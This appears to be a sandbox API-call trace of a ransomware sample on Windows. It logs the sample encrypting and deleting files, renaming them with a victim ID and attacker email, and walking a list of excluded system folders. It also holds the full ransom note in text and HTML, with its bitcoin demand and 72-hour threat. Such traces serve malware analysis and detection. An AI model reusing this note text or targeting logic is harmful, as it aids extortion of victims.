	[0178.875] CreateFileW (lpFileName="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0178.876] WriteFile (in: hFile=0x390, lpBuffer=0xfdd180*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesWritten=0x18b358*=0x350, lpOverlapped=0x0) returned 1
	[0178.879] CloseHandle (hObject=0x390) returned 1
	[0178.880] CloseHandle (hObject=0x388) returned 1
	[0178.880] DeleteFileW (lpFileName="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml")) returned 1
	[0178.906] DeleteFileW (lpFileName="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml")) returned 0
	[0178.906] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x7440ba2d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x0, dwReserved1=0x0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", cAlternateFileName="UPDATE~1.XML")) returned 0
	[0178.906] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.906] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.907] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\USOPrivate\\UpdateStore" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore"
	[0178.907] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*"
	[0178.907] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.913] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.913] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0178.913] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.914] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.914] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.917] CloseHandle (hObject=0x384) returned 1
	[0178.917] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.918] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0178.919] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.919] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.919] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.919] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.920] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0178.920] CloseHandle (hObject=0x384) returned 1
	[0178.920] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.920] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.920] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.920] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0178.921] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.921] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.921] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0178.924] CloseHandle (hObject=0x384) returned 1
	[0178.925] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.925] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.926] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0178.926] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.927] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.927] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.927] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.927] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0178.928] CloseHandle (hObject=0x384) returned 1
	[0178.928] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x84297732, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x842bea08, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.928] lstrlenW (lpString="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*") returned 45
	[0178.928] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.928] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\usoprivate\\updatestore\\*.*") returned 0x2d
	[0178.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.929] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="windows") returned 0x0
	[0178.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.929] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="boot") returned 0x0
	[0178.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.929] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="system volume information") returned 0x0
	[0178.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.930] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.930] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="temp") returned 0x0
	[0178.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.930] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="program files") returned 0x0
	[0178.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.931] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.931] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="appdata") returned 0x0
	[0178.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.931] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="application data") returned 0x0
	[0178.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.931] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="winnt") returned 0x0
	[0178.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.932] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="tmp") returned 0x0
	[0178.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.932] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="cache") returned 0x0
	[0178.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.932] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.932] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="webcache") returned 0x0
	[0178.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.933] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="inetcache") returned 0x0
	[0178.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.933] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="nvidia") returned 0x0
	[0178.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.933] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="packages") returned 0x0
	[0178.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.933] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="cookies") returned 0x0
	[0178.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.934] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="programdata") returned 0x0
	[0178.934] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.934] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.934] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x84297732, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x842bea08, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.934] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.934] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842bea08, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x842bea08, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x842e3bb6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.934] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842bea08, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x842bea08, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x842bea08, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.934] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8424b388, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8424b388, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8427161f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0x0, dwReserved1=0x0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UPDATE~1.SCL")) returned 1
	[0178.935] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8424b388, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8424b388, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8427161f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0x0, dwReserved1=0x0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UPDATE~1.SCL")) returned 0
	[0178.935] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.935] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.935] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 0
	[0178.935] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.936] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0178.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1
	[0178.936] lstrcmpW (lpString1="USOShared", lpString2="..") returned 1
	[0178.936] lstrcmpW (lpString1="USOShared", lpString2=".") returned 1
	[0178.936] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.936] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.936] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="USOShared" | out: lpString1="C:\\Users\\All Users\\USOShared") returned="C:\\Users\\All Users\\USOShared"
	[0178.937] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\USOShared" | out: lpString1="C:\\Users\\All Users\\USOShared") returned="C:\\Users\\All Users\\USOShared"
	[0178.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\") returned="C:\\Users\\All Users\\USOShared\\"
	[0178.937] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\USOShared\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\") returned="C:\\Users\\All Users\\USOShared\\"
	[0178.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\USOShared\\*.*") returned="C:\\Users\\All Users\\USOShared\\*.*"
	[0178.937] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOShared\\*.*" (normalized: "c:\\users\\all users\\usoshared\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.938] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\*.*") returned 32
	[0178.938] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.953] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\all users\\usoshared\\*.*") returned 0x20
	[0178.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.985] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="windows") returned 0x0
	[0178.985] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.985] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="boot") returned 0x0
	[0178.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.986] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="system volume information") returned 0x0
	[0178.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.986] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.986] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="temp") returned 0x0
	[0178.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.987] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="program files") returned 0x0
	[0178.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.987] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.987] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="appdata") returned 0x0
	[0178.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.987] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="application data") returned 0x0
	[0178.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.988] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="winnt") returned 0x0
	[0178.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.988] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="tmp") returned 0x0
	[0178.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.988] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="cache") returned 0x0
	[0178.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.989] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.989] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="webcache") returned 0x0
	[0178.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.989] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="inetcache") returned 0x0
	[0178.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.989] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="nvidia") returned 0x0
	[0178.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.990] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="packages") returned 0x0
	[0178.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.990] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="cookies") returned 0x0
	[0178.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.990] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="programdata") returned 0x0
